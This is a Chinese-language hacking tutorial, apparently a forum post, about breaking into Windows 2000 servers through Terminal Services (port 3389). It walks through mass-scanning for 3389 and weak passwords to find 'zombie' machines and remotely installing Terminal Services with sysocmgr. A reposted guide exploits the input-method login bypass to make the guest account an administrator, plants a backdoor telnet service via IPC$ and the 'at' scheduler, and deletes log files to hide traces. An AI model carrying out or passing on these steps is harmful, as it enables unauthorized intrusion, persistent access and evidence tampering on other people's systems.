[第3天]從終端服務3389講起
好現在我們就來說一個簡單的入侵,從3389找個殭屍電腦(沒有殭屍電腦的話,對自己的技術提高是沒好處的,不能老是看卻不練啊,陳同學你說對嗎?)
請各位注意,我這裡并不是說什麼爛鬼輸入法漏洞。這種漏洞差不多已經絕迹了,太難找了,如果有人找到了,那恭喜你啦。衆所周知,有開3389的一般都是伺服器,也就是說有很大可能帶區域網路的,而内部入侵比外部要友善一點,這對大家是很好的,我想看我這個東西的很多都是學生吧(聲明我就個學生哦)。如何能快速友善的得到開了終端的肉機呢?這需要用到兩個工具,都是掃描工具來的,scanner3.0和焦點的xscan。打開scanner,輸入一段IP,範圍要大一點,scanner速度很快的。在“所有端口從”那裡都填3389,點選“開始”就可以開工了。
很快的,掃描完成,結果出來了。點選右下腳的“删除”把多餘的IP删了,隻留下開了3389的IP。再點選“儲存”,把結果儲存到檔案夾裡。找到儲存檔案的目錄,打開它。用記事本的替換功能把它儲存為一個純IP的TXT檔案。“編輯-替換”在“查找内容”裡輸入要删除的垃圾,再點“全部替換”就行了。打開xscan,點選左邊的藍色按鈕,進入“掃描闆塊”,隻需在“SQL-Server弱密碼”“NT-Server弱密碼”前打鈎,其他都清除掉。再點選右邊的藍色按鈕,進入“掃描參數”,鈎上“從檔案擷取主機清單”,打開剛才替換成純IP的TXT檔案,确定之後就可以掃描了。這時需要比較長的時間!(注意我是拿3.0為例的,其他的也差不多)。确定目标,用mstsc(登陸終端的工具,這個我不喜歡用,但确實很容易上手的)登陸對方主機後,打開對方cmd.exe,輸入“net use”,先看看有沒有人也在連接配接這部機(安全一點好,畢竟不是在學雷峰啊)。“net view”指令之後當出現一堆前面帶\\字元的就表示~~就表示什麼呢??我
想大家都非常明白吧!,如果不明白的話,我。。(也不知道怎麼說了 )
想做個補充
發現很多朋友對什麼叫終端服務有點模糊
好,我們就詳細說說 畢竟這個概念很重要的
終端服務提供了通過作為終端仿真器工作的“瘦客戶機”軟體遠端通路伺服器桌面的能力。終端服務隻把該程式的使用者界面傳給客戶機。客戶機然後傳回鍵盤和滑鼠單擊動作,以便由伺服器處理。每個使用者都隻能登入并看到它們自己的會話,這些會話由伺服器作業系統透明地進行管理,而且與任何其他客戶機會話無關。客戶軟體可以運作在多個客戶機硬體裝置上,包括計算機和基于 Windows 的終端。其他裝置,如 Macintosh 計算機或基于 UNIX 的工作站,也可以使用其他第三方的軟體連接配接到終端伺服器。
終端服務可以在應用伺服器模式或遠端管理模式下在伺服器上進行配置。作為應用伺服器,終端服務提供了一種有效而可*的方式,通過網絡伺服器分發基于 Windows 的程式。在應用伺服器模式下,終端服務為可能無法正常運作Windows 的計算機顯示 Windows 2000 的桌面以及目前基于 Windows 的大多數應用程式。在遠端管理模式下使用時,終端服務提供了遠端通路的能力,使您可以從網絡上的任何地方虛拟地管理您的伺服器。
終端服務有以下好處:
更快地顯示 Windows 2000 的桌面。終端服務架設了一座從舊式桌面遷移到 Windows 2000 Professional 的橋梁,為非計算機桌面以及需要進行硬體更新才能在本地完全運作 Windows 2000 作業系統的計算機提供了一種虛拟的 Windows 2000 桌面環境。終端服務客戶可用于多種不同的桌面平台,包括 MS-DOS、基于 Windows 的終端、Macintosh 和 UNIX。(與 MS-DOS、Macintosh 和基于 UNIX 的計算機的連接配接需要附加的軟體)。充分利用已有的硬體。終端服務擴充了分布式計算模型,允許計算機同時作為瘦客戶機和具有完整功能的個人計算機操作。當計算機在現有的網絡上時,可以繼續使用,同時也可作為能仿真 Windows 2000 Professional 桌面的瘦客戶機使用。
程式的集中配置。使用運作在 Windows 2000 Server 上的終端服務,所有程式的執行、資料的處理以及資料的存儲都在伺服器上進行,程式得以集中配置。終端服務可確定所有客戶機都能通路目前版本的程式。軟體隻能在伺服器上安裝一次,而不能安裝在您機關的每個桌面上,這樣可減少單獨更新計算機所花費的成本。
遠端管理。終端服務提供了對 Windows 2000 Server 的遠端管理,為系統管理者提供了從任何客戶機通過廣域網或撥接上網遠端管理其伺服器的一種方法。
功能:
易于使用
可管理性
安全性
功能 說明 詳細資訊,請參閱:
自動的本地列印機支援 Windows 2000 Server 終端服務可以添加并自動重新連接配接終端服務客戶所連接配接的列印機。 提供對本地列印機的客戶通路
剪貼闆重定向 現在,使用者可以在運作于本地計算機和終端伺服器上的程式之間剪切和粘貼。 共享的剪貼闆性能增強 對緩存功能的增強,包括持久性緩存、資料包的利用和資料幀大小,明顯地改進了終端服務的性能。 位圖緩存
漫遊式斷開連接配接支援 此功能使使用者不用登出即可從會話中斷開連接配接。在斷開時會話仍可保持活動狀态,這使得使用者可以從另一台計算機中或在稍後某個時間重新連接配接到現有會話。重新連接配接需要登入,以便在任何時候都能保證每個會話的安全性。 登出或斷開連接配接多登入支援 使用者可以登入到多個會話,同時從一個或多個客戶機到多個 Windows 2000 Server,或者多次登入到一個伺服器。這樣,使用者就可以同時執行多項任務或運作多個單獨的桌面會話。 管理使用者和客戶機可管理××× 說明 詳細資訊,請參閱:
會話遠端控制 支援者可檢視或控制另一終端服務會話。鍵盤輸入、滑鼠移動以及圖形顯示可在兩個終端服務會話之間共享,為支援者提供了診斷和解決配置問題以及遠端教育訓練使用者的能力。此功能對于帶有分支機構的機關特别有用。 遠端控制
網絡負載平衡 網絡負載平衡使終端服務客戶可連接配接到運作終端服務的伺服器組中最輕閑的成員。 網絡負載平衡和終端服務
基于 Windows 的終端 根據 Windows CE 作業系統和遠端桌面協定 (RDP) 的自定義實作,不同的制造商可提供基于 Windows 的終端。
客戶連接配接管理器 管理者和使用者可以為一個程式或全部桌面通路建立到伺服器的預定義連接配接。客戶連接配接管理器在客戶機桌面上建立圖示,以便能通過一次單擊連接配接到一個或多個終端伺服器。想在計算環境中提供單個程式的管理者可以建立連接配接并将該連接配接與終端服務客戶軟體一同分發。 管理終端服務使用者連接配接
終端服務授權 終端服務授權幫助系統管理者和采購部門跟蹤客戶機及其相關許可證。 授權終端服務
分布式檔案系統 (DFS) 支援 對分布式檔案系統 (DFS) 的支援使使用者可以連接配接到 DFS 共享位置,而且使管理者可以從終端伺服器主要 DFS 共享。 分布式檔案系統概述終端服務管理器 管理者可以使用終端服務管理器查詢和管理 Windows 2000 Server 上的終端服務會話、使用者和程序。 管理終端服務終端服務配置 終端服務連接配接配置可用于建立、修改和删除 Windows 2000 Server 上的一個或一組會話并通路伺服器設定。 配置終端服務與 Windows 2000 Server“本地使用者群組”以及“Active Directory 使用者和計算機”的內建 管理者可以按照為 Windows 2000 Server 使用者建立帳戶的相同方式為終端服務使用者建立帳戶。另有一些字段可用來指定終端服務專用資訊,如終端服務配置檔案路徑和主目錄。 終端服務使用者帳戶 與 Windows 2000 Server 系統螢幕的內建 與 Windows 2000 Server 系統螢幕的內建使管理者可以螢幕終端服務系統性能,包括跟蹤處理器的使用情況、記憶體配置設定和分頁記憶體使用情況,并在每個使用者的會話之間交換。 性能監視消息傳遞支援 管理者可以就一些重要的資訊警告使用者,如系統關機、更新或新程式。 使用終端服務管理器遠端管理 具有管理級特權而且可通路終端服務管理級實用程式的任何使用者都可以遠端管理運作終端服務的伺服器的各方面工作。
可配置的會話逾時設定 管理者可以通過配置會話逾時來減少伺服器資源的使用。管理者可以指定活動會話的長度以及會話可在伺服器上閑置多長時間 配置會話限制
加密 多級加密使管理者可以根據安全性需要在三種不同級别(低級、中級或進階)上加密在 Windows 2000 Server 和終端服務客戶之間傳輸的所有或部分資料。另外,終端服務登入過程包括更改密碼、桌面解鎖以及螢幕保護功能解鎖
。登入過程是加密的,以確定使用者名稱和密碼的安全傳輸。終端服務支援在伺服器和客戶機之間的 40 位和 128 位加密(128 位加密隻能在美國和加拿大使用)。 确定加密的級别
限制登入嘗試和連接配接時間 管理者可以限制使用者登入嘗試次數,以防止有人未授權通路伺服器。另外,個别使用者或分組使用者的連接配接時間可以進行限制。 配置終端服務
終端服務配置概述
終端服務連接配接提供了客戶機可用于登入到伺服器上某個會話的連結。TCP/IP 連接配接是當終端服務在 Windows 2000 Server 上啟用時自動配置的。使用終端服務配置,您可以更改連接配接的預設屬性或添加新連接配接。
終端服務配置
打開終端服務配置時,您将會看到已經配置的連接配接。這稱為 RDP-TCP 連接配接。通常,這隻是需要為使用終端伺服器的客戶配置的連接配接。對于終端伺服器,隻能為每個網卡配置一個 RDP(遠端桌面協定)連接配接。如果要配置其他的 RDP 連接配接
,您必須安裝附加的網卡。
使用終端服務配置,您可以重新配置 RDP-TCP 連接配接的屬性,包括限制客戶機會話在伺服器上保持活動狀态的時間、設定加密的保護級别以及選擇您希望使用者群組具備的權限。某些連接配接屬性也可以使用“本地使用者群組”的終端服務擴充程
序在每使用者基礎上配置。例如,當您使用“本地使用者群組”的終端服務擴充程式時,可以為每個使用者設定不同會話期限。使用終端服務配置,您可以隻在每連接配接基礎上設定會話期限,這意味着相同期限将應用于使用連接配接登入到伺服器的
所有使用者。
除配置連接配接以外,您可以使用“終端服務配置”功能配置可應用于終端伺服器的設定。包括臨時檔案夾的設定、預設連接配接安全性以及啟用/禁用 Internet 連接配接器許可。詳細資訊,請參閱配置伺服器設定。
基于 Citrix CA 的客戶機
終端服務配置還用于為基于 Citrix CA 的客戶機配置連接配接。當 Citrix CA 協定和基于 Citrix CA 的客戶軟體添加到該系統時,可以使用 TCP/IP、同步、IPX/SPX 或 NetBIOS 傳輸協定配置這些連接配接
有很多朋友問怎麼開啟3389終端服務下面我們一起來探索一下遠端開啟3389的方法. 首先我們應該了解3389終端服務,可以運作在什麼系統下,個人了解,終端服務在M$的大部分
産品中都可運作,如:winnt4/win2000server/win2000ADV-server/win2000DS/XP等.
但winnt4中是需要單獨購買的,2000專業版不能遠端安裝終端服務的,至少我沒成功過.
我們在以下的探索中,是以win2000server和進階server為例的.(現在用的也最多).
現在開始. 假設我們拿到了一個主機的管理者帳戶和密碼.
主機: 192.168.0.1
帳号: administrator
密碼: 7788
2000系統安裝在c:\winnt下
從上面的的介紹可以知道,2000專業版是不可以遠端安裝終端服務的,那我們就要首先來
判斷此主機是專業版還是伺服器版,才能進入下一個環節. 我們可以先用對方所開帳戶判斷: c:\>letmein \\192.168.0.1 -all -d
stating connecting to server ...
Server local time is: 2002-1-13 10:19:22
Start get all users FORM server...
--------------------------
Total = 5
num0= Administrator ()
num1= Guest ()
num2= IUSR_servername (Internet 來賓帳号 )
num3= IWAM_servername (啟動 IIS 程序帳号)
num4= TsInternetUser (TsInternetUser)
-------------------------- 一般情況num2/3/4這三個帳戶都是2000server預設開啟的.
2000專業版預設是不開這些帳戶的. 我們也可以掃描對方開放的端口進一步确認:
用掃描軟體如:superscan3.exe掃描對方所開端口
判斷對方是否開啟25,3372等2000server預設開啟的端口. 當然我們還可以使用一些工具,如:cmdinfo.zip
這2個東東可以獲得本地或遠端NT/2K主機的版本,系統路徑,源盤路徑,PACK版本,安裝時間等一
系列資訊,一個圖形界面,一個指令行.
通過傳回的資訊就可以很清楚的了解對方主機情況. 還有一些其他的方法來判斷,如:從對方所開的服務來确定等,
從上面的判斷準确率還算高,别的就不一一說明了.
如果你在以上步驟裡發現對方主機并沒有那3個帳戶,預設端口也沒開,
或cmdinfo傳回的資訊對方是2000專業版,你就要放棄安裝3389的計劃了.
現在我們要進入下一環節:
判斷終端服務到底有沒有安裝? 你也許要問:為什麼還要判斷啊?我掃描沒有發現3389端口啊
這裡就需要解釋一下,如果裝了終端服務元件,可能有哪幾種情況掃描不到3389端口?
1.終端服務termservice在"管理工具">>>"服務"中被禁用.
2.終端服務連接配接所需的RDP協定在"管理工具">>>"終端服務配置"中被停用連接配接.
3.終端服務預設連接配接端口3389被人為的改變.如何改變請看修改終端服務預設的3389端口
4.終端服務綁定的網絡擴充卡不是外網的.
5.防火牆和端口過濾之類的問題.
6.....(還有我沒想到的)
其實,我們遇到最多的情況就是以上5種情況. 現在開始判元件是否被安裝. 先與遠端主機連接配接,映射遠端主機C槽為本地Z盤
net use z: \\192.168.0.1\c$ "7788" /user:"administrator"
指令成功完成。 然後轉到Z盤,檢查
Z:\Documents and Settings\All Users\「開始」菜單\程式\管理工具>
裡是否有 "終端服務管理器"和"終端服務配置"的快捷方式檔案
如有已安裝服務元件的會有,反之,沒有(98% 人為故意删的可能性較小)
我們還可以在下一步telnet到對方主機後使用終端服務自帶的指令進一步的核實. 判斷完畢,對方好像是沒有安裝終端服務元件,可以進入下一步:
telnet登陸對方主機,準備安裝服務元件. 在這裡,我強烈建議使用2000自帶的telnet服務端登陸,
有回顯,不容易出錯.個人感覺使用它,一次成功的比例高很多.(呵呵~,個人了解啊!)
就算沒有開,打開用完後再關掉就完了.
.abu.寫的最快速登入WIN2K TELNET 服務已經把這個方法介紹的非常詳細,
而且他的辦法(在本機建立同名,同密碼帳戶),讓快速實作telnet登陸成為現實. 假如我們已開啟對方23端口,
telnet 192.168.0.1
輸入使用者名/密碼
*===============================================================
歡迎使用 Microsoft Telnet 伺服器。
C:\>
\\成功進入!!!! 進入後,再次檢查終端元件是否安裝:
c:\>query user
這個工具需要安裝終端服務. 這樣就進一步确定了元件沒有被安裝.如果傳回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 運作中 . 2002-1-12 22:5
\\類似這樣的資訊,可能元件就已安裝. 好!都清楚了,可以開始安裝了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s //檢查INF檔案的位置
c:\WINNT\inf 的目錄 2000-01-10 20:00 3,770 sysoc.inf
1 個檔案 3,770 位元組
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s //檢查元件安裝程式
c:\WINNT\system32 的目錄 2000-01-10 20:00 42,768 sysocmgr.exe
1 個檔案 42,768 位元組
c:\>echo [Components] > c:\wawa
c:\>echo TSEnable = on >> c:\wawa
//這是建立無人參與的安裝參數
c:\>type c:\wawa
[Components]
TSEnable = on
//檢查參數檔案
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q
這一條就是真正安裝元件的指令.
以上這條指令沒有加/R參數,主機在安裝完後自動重起.
如若加了/R參數主機就不會重起. 如果一切正常的話,幾分鐘後對方主機将會離線,當它重新回來時,
3389終端服務就已經開啟.你就可以連上去了. 問題和建議: A 在安裝過程中,不使用/R,有時主機也不會重起,你就要手動重起他,但在使用諸如:iisreset /reboot指令時,對方
的螢幕會出現個對話框,寫着誰引起的這次啟動,離重起還有多少秒. B 一次不行可以再試一次,在實際中很有作用. C 在輸入sysocmgr指令開始安裝時,一定不要把指令參數輸錯,那會在對方出現一個大的對話框,是sysocmgr的幫助,很是顯
眼,
而且要求确定.在你的螢幕上是不會有任何反應的,你不會知道出錯,是以會有B的建議.
好了以後你就想幹什麼就幹什麼了。不過有時候還真不知道幹什麼,總之得幹個事,裝個什麼區域網路控制軟體,不過不要體積太大,容易被發現。
超強 C 語言代碼,你有信心看懂嗎?
剛剛說有輸入法漏洞的機子很少了,但有些朋友擔心還有怎麼辦,不是吃大虧了嗎?這樣我找了一篇寫的不錯的文章貼一下( 注意是轉載)寫的不錯,據說是新寫的,這位大哥也真閑啊
WIN2000中文簡體版存在的輸入法漏洞,可以使本地使用者繞過身分驗證機制進入系統内部。經實驗,WIN2000中文簡體版的終端服務,在遠端操作時仍然存在這一漏洞,而且危害更大。
WIN2000的終端服務功能,能使系統管理者對WIN2000進行遠端操作,采用的是圖形界面,能使使用者在遠端控制計算機時功能與在本地使用一樣,其預設端口為3389,使用者隻要裝了WIN2000的用戶端連接配接管理器就能與開啟了該服務的計算機
相聯。是以這一漏洞使終端服務成為WIN2000的合法木馬。
工具:用戶端連接配接管理器,下載下傳位址:自己找吧,天天有好幾種呢。
入侵步驟:
一,獲得管理者賬号。
我們先對一個網段進行掃描,掃描端口設為3389,運作用戶端連接配接管理器,将掃描到的任一位址加入到,設定好用戶端連接配接管理器,然後與伺服器連結。幾秒鐘後,螢幕上顯示出WIN2000登入界面(如果發現是英文或繁體中文版,放棄,
另換一個位址),用CTRL+SHIFT快速切換輸入法,切換至全拼,這時在登入界面左下角将出現輸入法狀态條(如果沒有出現,請耐心等待,因為對方的資料流傳輸還有一個過程)。用右鍵點選狀态條上的微軟徽标,彈出“幫助”(如果
發現“幫助”呈灰色,放棄,因為對方很可能發現并已經補上了這個漏洞),打開“幫助”一欄中“操作指南”,在最上面的工作列點選右鍵,會彈出一個菜單,打開“跳至URL”。此時将出現WIN2000的系統安裝路徑和要求我們填入的
路徑的空白欄。比如,該系統安裝在C盤上,就在空白欄中填入"c:\winnt\system32"。然後按“确定”,于是我們就成功地繞過了身份驗證,進入了系統的SYSTEM32目錄。
現在我們要獲得一個賬号,成為系統的合法使用者。在該目錄下找到"net.exe",為"net.exe"建立一個快捷方式,右鍵點選該快捷方式,在“屬性”->“目标”->c:\winnt\system32\net.exe後面空一格,填入"user guest /active
:yes"點“确定”。這一步驟目的在于用net.exe激活被禁止使用的guest賬戶,當然也可以利用"user 使用者名 密碼/add",建立一個新賬号,但容易引起網管懷疑。運作該快捷方式,此時你不會看到運作狀态,但guest使用者已被激活。
然後又修改該快捷方式,填入"user guest 密碼",運作,于是guest便有了密碼。最後,再次修改,填入“localgroup administrators guest /add,将guest變成系統管理者。
注意事項:1、在這過程中,如果對方管理者正在使用終端服務管理器,他将看到你所打開的程序id,你的ip和機器名,甚至能夠給你發送消息。
2、終端伺服器在驗證你的身份的時候隻留給了你一分鐘的時間,在這一分鐘内如果你不能完成上述操作,你隻能再連結。
3、你所看到的圖像與操作會有所延遲,這受網速的影響。
二,建立跳闆。
再次登入終端用務器,以"guest"身份進入,此時guest已是系統管理者,已具備一切可執行權。打開“控制台”,進入“網絡和拔号連接配接”,在“本地連接配接”或“拔号連接配接”中檢視屬性,看對方是否選擇“Microsoft 網絡的檔案和打
印機共享”,如果沒有,就打上勾。對方如果使用的是拔号上網,下次拔号網絡共享才會打開。
退出對方系統,在本地機指令提示符下,輸入
net use \\IP Address\IPC$ ["password"] /user:"guset",通過IPC的遠端登陸就成功了。
登陸成功之後先複制一個Telnet的程式上去(小榕流光安裝目錄下的Tools目錄裡的Srv.exe,另外,還有ntml.xex,一會要用),這個程式是在對方上面開一個Telnet服務,端口是99。
copy c:\hack\srv.exe \\***.***.***.***\admin$
然後利用定時服務啟動它,先了解對方的時間:
net time \\***.***.***.***
顯示:
\\***.***.***.*** 的目前時間是 2001/1/8 下午 08:55
指令成功完成。
然後啟動srv.exe:
at \\***.***.***.*** 09:00 srv.exe
新加了一項作業,其作業 ID = 0
過幾分鐘後,telnet ***.***.***.*** 99
這裡不需要驗證身份,直接登入,顯示:
c:\winnt:\system32>
我們就成功登陸上去了。然後又在本地打開指令提示符,另開一個視窗,輸入:
copy c:\hack\ntlm.exe \\211.21.193.202\admin$
把事先存放在hack目錄裡的ntlm.exe拷過去。然後又回到剛才的telnet視窗,運作ntlm.exe
C:\WINNT\system32>ntlm
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
Done!
C:\WINNT\system32>
好,現在我們來啟動WIN2000本身的telnet,首先終止srv.exe的telnet服務:
net stop telnet 系統告訴你并沒有啟動telnet,不理它,繼續:
net start telnet 這次真的啟動了telnet,我們可以在另開的指令提示符視窗telnet到對方的
23端口,驗證身份,輸入我們的guest賬号和密碼,它就真正成為我們的跳闆了。我們可以利用它到其它的主機去。
三、掃除腳印:
删除為net.exe 建立的快捷方式,删除winnt\system32\logfiles下邊的日志檔案
![8個道理,讓你的程式人生受益終生[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)